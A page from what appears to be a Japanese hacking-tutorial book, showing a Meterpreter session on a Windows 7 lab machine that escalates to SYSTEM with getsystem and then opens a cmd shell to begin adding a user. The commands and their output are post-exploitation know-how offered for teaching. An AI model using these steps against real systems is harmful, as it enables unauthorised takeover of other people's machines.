
276
第2部 ハッキングを体験する
at 2018-07-27 22:41:07 +0900
meterpreter > getuid ←
Meterpreterプロンプトが返ってくる。
Server username: IE8WIN7¥IEUser ←
この時点ではまだSYSTEM権限ではない。
meterpreter > getsystem ←
明示的にSYSTEM権限になることを指示する。
...got system via technique 1 (Named Pipe Impersonation (In Memory/↲
Admin)).
meterpreter > getuid
Server username: NT AUTHORITY¥SYSTEM ←
SYSTEM権限になった。
なお、このアプローチはWindows 10 ではうまくいきません。
●ターゲット端 末 に ユーザーを追 加する
SYSTEM権限があれば、ユーザーを追加・編集・削除できます。
①SYSTEM 権限であることを確認する
SYSTEM権限であることを確認します。
meterpreter > getuid
Server username: NT AUTHORITY¥SYSTEM
② シェルを 呼 び 出 す
shellコマンドでシェル(Windows では "cmd.exe")を呼び出します。
meterpreter > shell
Process 3340 created.
Channel 1 created. ...